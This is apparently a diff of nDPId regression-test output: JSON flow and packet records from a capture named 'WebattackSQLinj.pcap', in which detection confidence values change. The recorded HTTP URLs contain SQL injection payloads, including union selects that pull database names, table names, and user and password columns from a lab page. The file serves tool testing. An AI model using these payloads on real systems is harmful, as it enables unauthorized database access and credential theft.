-01007{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499348413192,"flow_last_seen":1499348413193,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":460,"flow_tot_l4_payload_len":460,"flow_avg_l4_payload_len":115,"midstream":0,"thread_ts_msec":1499348413193,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36198,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/sqli\/?id=1%27+and+1%3D1%23&Submit=Submit","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} +01007{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499348413192,"flow_last_seen":1499348413193,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":460,"flow_tot_l4_payload_len":460,"flow_avg_l4_payload_len":115,"midstream":0,"thread_ts_msec":1499348413193,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36198,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/sqli\/?id=1%27+and+1%3D1%23&Submit=Submit","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":22,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348422024,"flow_last_seen":1499348422024,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348422024,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36200,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1499348422024,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348422024,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8A7ZAAD4GwhqsEAABwKgKMo1oAFD9gXeGAAAAAKACchDm1AAAAgQFtAQCCAoBPnQwAAAAAAEDAwc="} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1499348422024,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348422024,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQjWik93fQ\/YF3h6AScSCBYAAAAgQFtAQCCAoD6EWjAT50MAEDAwc="} 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1499348422025,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348422025,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0A7dAAD4GwiGsEAABwKgKMo1oAFD9gXeHpPd30YAQAOUgaAAAAQEICgE+dDAD6EWj"} -01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":25,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499348422024,"flow_last_seen":1499348422025,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":537,"flow_tot_l4_payload_len":537,"flow_avg_l4_payload_len":134,"midstream":0,"thread_ts_msec":1499348422025,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36200,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/sqli\/?id=1%27+and+1%3D1+union+select+database%28%29%2C+user%28%29%23&Submit=Submit","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} +01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":25,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499348422024,"flow_last_seen":1499348422025,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":537,"flow_tot_l4_payload_len":537,"flow_avg_l4_payload_len":134,"midstream":0,"thread_ts_msec":1499348422025,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36200,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/sqli\/?id=1%27+and+1%3D1+union+select+database%28%29%2C+user%28%29%23&Submit=Submit","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":32,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348433464,"flow_last_seen":1499348433464,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348433464,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36202,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1499348433464,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348433464,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8WwtAAD4GasWsEAABwKgKMo1qAFDC1CRXAAAAAKACchBpgwAAAgQFtAQCCAoBPn9cAAAAAAEDAwc="} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1499348433464,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348433464,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQjWqDJLV7wtQkWKAScSDdCgAAAgQFtAQCCAoD6FDPAT5\/XAEDAwc="} 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":34,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1499348433465,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348433465,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0WwxAAD4GasysEAABwKgKMo1qAFDC1CRYgyS1fIAQAOV8EgAAAQEICgE+f1wD6FDP"} -01070{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":35,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499348433464,"flow_last_seen":1499348433465,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":1499348433465,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36202,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/sqli\/?id=1%27+and+1%3D1+union+select+null%2C+table_name+from+information_schema.tables%23&Submit=Submit","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} +01070{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":35,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499348433464,"flow_last_seen":1499348433465,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":1499348433465,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36202,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/sqli\/?id=1%27+and+1%3D1+union+select+null%2C+table_name+from+information_schema.tables%23&Submit=Submit","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":43,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348467295,"flow_last_seen":1499348467295,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348467295,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36204,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1499348467295,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348467295,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8NrBAAD4GjyCsEAABwKgKMo1sAFAXzJbWAAAAAKACchCBAAAAAgQFtAQCCAoBPqBmAAAAAAEDAwc="} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1499348467295,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348467295,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQjWwuedQjF8yW16AScSAJgQAAAgQFtAQCCAoD6HHZAT6gZgEDAwc="} 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":45,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1499348467296,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348467296,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0NrFAAD4GjyesEAABwKgKMo1sAFAXzJbXLnnUJIAQAOWoiAAAAQEICgE+oGYD6HHZ"} -01048{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":46,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499348467295,"flow_last_seen":1499348467296,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":599,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":1499348467296,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36204,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/sqli\/?id=1%27+and+1%3D1+union+select+user%2C+password+from+users%23&Submit=Submit","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} +01048{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":46,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499348467295,"flow_last_seen":1499348467296,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":599,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":1499348467296,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36204,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/sqli\/?id=1%27+and+1%3D1+union+select+user%2C+password+from+users%23&Submit=Submit","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":53,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348480992,"flow_last_seen":1499348480992,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348480992,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36206,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":53,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1499348480992,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348480992,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8IqhAAD4GoyisEAABwKgKMo1uAFBrxY9uAAAAAKACchAnDQAAAgQFtAQCCAoBPq3GAAAAAAEDAwc="} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":54,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1499348480992,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348480992,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQjW5ct+zHa8WPb6AScSBbSwAAAgQFtAQCCAoD6H85AT6txgEDAwc="} 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":55,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1499348480993,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348480993,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0IqlAAD4Goy+sEAABwKgKMo1uAFBrxY9vXLfsyIAQAOX6UQAAAQEICgE+rccD6H85"} -00994{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":56,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499348480992,"flow_last_seen":1499348480993,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":523,"flow_tot_l4_payload_len":523,"flow_avg_l4_payload_len":130,"midstream":0,"thread_ts_msec":1499348480993,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36206,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/sqli\/?id=1%27&Submit=Submit","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} +00994{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":56,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499348480992,"flow_last_seen":1499348480993,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":523,"flow_tot_l4_payload_len":523,"flow_avg_l4_payload_len":130,"midstream":0,"thread_ts_msec":1499348480993,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36206,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/sqli\/?id=1%27&Submit=Submit","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":63,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348494345,"flow_last_seen":1499348494345,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348494345,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36208,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":63,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1499348494345,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348494345,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8SndAAD4Ge1msEAABwKgKMo1wAFAblvCmAAAAAKACchAI9wAAAgQFtAQCCAoBPrrRAAAAAAEDAwc="} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":64,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1499348494345,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348494345,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQjXBGdqbdG5bwp6AScSCMVgAAAgQFtAQCCAoD6IxDAT660QEDAwc="} 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":65,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1499348494346,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348494346,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0SnhAAD4Ge2CsEAABwKgKMo1wAFAblvCnRnam3oAQAOUrXgAAAQEICgE+utED6IxD"} -01007{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":66,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499348494345,"flow_last_seen":1499348494346,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":536,"flow_tot_l4_payload_len":536,"flow_avg_l4_payload_len":134,"midstream":0,"thread_ts_msec":1499348494346,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36208,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/sqli\/?id=1%27+and+1%3D1%23&Submit=Submit","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} +01007{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":66,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499348494345,"flow_last_seen":1499348494346,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":536,"flow_tot_l4_payload_len":536,"flow_avg_l4_payload_len":134,"midstream":0,"thread_ts_msec":1499348494346,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36208,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/sqli\/?id=1%27+and+1%3D1%23&Submit=Submit","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":73,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348506489,"flow_last_seen":1499348506489,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348506489,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36210,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":73,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1499348506489,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348506489,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8gghAAD4GQ8isEAABwKgKMo1yAFDHw0SlAAAAAKACchD87AAAAgQFtAQCCAoBPsatAAAAAAEDAwc="} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":74,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1499348506489,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348506489,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQjXIW0CP4x8NEpqAScSAm\/AAAAgQFtAQCCAoD6JgfAT7GrQEDAwc="} 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":75,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1499348506490,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348506490,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0gglAAD4GQ8+sEAABwKgKMo1yAFDHw0SmFtAj+YAQAOXGAwAAAQEICgE+xq0D6Jgf"} -01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":76,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499348506489,"flow_last_seen":1499348506490,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":537,"flow_tot_l4_payload_len":537,"flow_avg_l4_payload_len":134,"midstream":0,"thread_ts_msec":1499348506490,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36210,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/sqli\/?id=1%27+and+1%3D1+union+select+database%28%29%2C+user%28%29%23&Submit=Submit","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} 